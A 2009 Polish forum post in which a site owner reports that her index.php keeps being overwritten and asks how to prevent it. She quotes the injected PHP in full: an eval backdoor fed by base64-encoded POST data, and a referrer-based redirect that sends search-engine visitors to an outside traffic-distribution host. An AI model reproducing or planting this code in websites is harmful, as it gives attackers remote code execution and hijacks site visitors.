Problem z index.php- spam albo wlam.. Opcje

[mika]

Witam.. od wczoraj mam dosc powazny problem. Mam plik index.php ktory rozszerzenie php ma tylko dlatego żeby dzialał licznik w PHP. Strona to http://niekochane.org
I problem jest taki ze od soboty ktoś lub coś zmienia zawartość mojego pliku index.php na taką:

Kod

<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://nasnezabanyat.biz/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://nasnezabanyat.biz/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>

Nie wiem co z tym zrobić, już drugi raz mi sie zmieniła zawartość pliku i musiałam nadpisać, ale przecież nie mogę chyba ciągle nadpisywać, chciałabym jakoś temu zapobiec.
Na php prawie wcale sie nie znam a licznik znalazłam w sieci, na jakiejś polskiej stronie o php.
Plik index.php ma uprawnienia 644.

Czy ktoś może spotkał się z czymś takim, czy ktoś wie jak temu zapobiec?

Ten post edytował mika 12.01.2009, 09:45:14